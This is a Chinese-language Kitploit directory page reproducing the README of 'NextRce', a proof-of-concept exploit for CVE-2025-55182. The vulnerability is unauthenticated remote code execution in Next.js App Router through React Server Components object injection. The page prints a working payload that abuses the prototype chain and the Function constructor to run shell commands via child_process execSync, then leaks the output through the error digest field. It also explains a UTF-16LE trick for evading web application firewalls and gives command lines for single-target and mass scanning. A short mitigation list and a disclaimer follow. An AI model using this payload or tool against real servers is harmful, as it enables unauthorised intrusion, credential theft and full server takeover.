Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182 — CVE-2025-55182的概念验证漏洞利用,演示了通过React Server Components中的服务器端对象注入,在Next.js App Router中实现未认证的远程代码执行(RCE),并利用UTF-16LE绕过WAF。 | Kitploit
工具/GitHubGitHub/ceh-aditya-raj/cve-2025-55182
漏洞分析漏洞利用Web应用程序漏洞利用WAF绕过渗透测试学习与教育红队Payload 开发
GitHubceh-aditya-raj/cve-2025-55182

CVE-2025-55182

CVE-2025-55182的概念验证漏洞利用,演示了通过React Server Components中的服务器端对象注入,在Next.js App Router中实现未认证的远程代码执行(RCE),并利用UTF-16LE绕过WAF。

查看仓库
2189个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 NextRce — CVE-2025-55182(Next.js / React 服务端组件 RCE)

NextRce 是一款安全研究工具,用于演示 CVE-2025-55182——一个存在于 Next.js App Router 应用中,使用 React Server Components (RSC) 和 Server Actions 的严重漏洞。

该漏洞允许攻击者通过滥用 Next.js 处理 Server Action 响应 以及解析服务端序列化 RSC 载荷的方式,实现 未认证远程代码执行(RCE)。


🛠 漏洞概述

CVE-2025-55182 存在于 Next.js App Router 架构中,可归类为在处理 multipart/form-data 请求时发生的 服务端对象注入 / 原型链滥用 问题。

当触发 Server Action 时,Next.js 服务器信任并反序列化结构化的客户端输入。通过发送特制的载荷,攻击者可以操纵内部解析逻辑,并在 Node.js 运行时中执行任意系统命令。


📌 根本原因

该漏洞由以下组合因素导致:

  • Server Actions 信任模型
    Server Actions 接受结构化的客户端载荷,这些载荷通过内部 React Server Component 解析逻辑处理,但验证不足。

  • RSC 解析过程中的对象注入
    精心构造的载荷可以滥用 JavaScript 原型链和构造函数引用,从而逃逸预期的对象作用域。

  • 清理不足
    内部字段如 then、_response 以及 form-data 获取器未得到充分保护,易受恶意操纵。

  • 基于编码的 WAF 绕过
    许多 Web 应用防火墙专注于 UTF-8 或标准 JSON。将载荷编码为 UTF-16LE 可使其在检查时被绕过,同时被 Next.js 服务器正确解码。


🔬 载荷分析

该利用依赖于在 multipart 请求中注入精心构造的 RSC 载荷。
载荷的简化版本如下所示:

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('{cmd}').toString('base64'); throw Object.assign(new Error('x'),{digest: res});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

🧠 利用步骤解析

1. 原型链劫持

  • "then": "$1:__proto__:then"
  • 这滥用了 JavaScript 的原型链,通过覆盖 then 属性,干扰了 Next.js 运行时中 React Server Component 处理期间 Promise 的解析。

2. 构造函数逃逸

  • "_formData": { "get": "$1:constructor:constructor" }
  • 这允许访问全局的 Function 构造函数,从而在预期沙箱之外执行任意 JavaScript。

3. 远程代码执行

  • process.mainModule .require('child_process') .execSync('{cmd}')
  • 访问 Node.js 内部模块
  • 同步执行任意操作系统命令
  • 以与 Next.js 服务器进程相同的权限运行

4. 基于摘要的输出窃取

  • throw Object.assign(new Error('x'), { digest: res });
  • 除非存在 digest 字段,Next.js 会抑制详细的错误消息。
  • 通过将 Base64 编码的命令输出附加到 digest 属性上,服务器无意中将执行结果返回在 HTTP 响应中。

5. WAF 绕过(UTF-16LE)

  • 载荷可以编码为 UTF-16LE,并以如下方式发送:
  • Content-Type: text/plain; charset=utf-16le
  • 许多 WAF 引擎无法解码并检查 UTF-16LE 内容,而 Next.js 服务器能够正确解码和处理,从而提高了利用的可靠性。

💥 影响

成功利用 CVE-2025-55182 可能导致:

  • 🔥 完全远程代码执行

  • 🗄️ 访问敏感数据和凭据

  • 🔗 基础设施内的横向移动

  • 📦 供应链攻击

  • 🚨 完全服务器接管

  • 严重程度:严重

  • 需要认证:否

🛡 缓解措施

防范 CVE-2025-55182 的方法:

  • 立即将 Next.js 升级到已修补的版本
  • 禁用未使用的 Server Actions
  • 强制执行对 multipart/form-data 请求的严格验证
  • 添加 WAF 规则以检测 UTF-16LE 编码的载荷
  • 监控异常的 Next-Action 标头和请求模式

🚀 使用方法

单个目标

  • python3 exploit.py -u https://target.com -c "whoami"

批量扫描(含 WAF 绕过)

  • python3 exploit.py -l urls.txt -B -t 50

⚠️ 免责声明

  • 本项目严格仅供教育、研究和授权的安全测试使用。

  • 请勿针对您不拥有或未经明确许可测试的系统使用此工具。

  • 作者对滥用行为不承担任何责任。

下载工具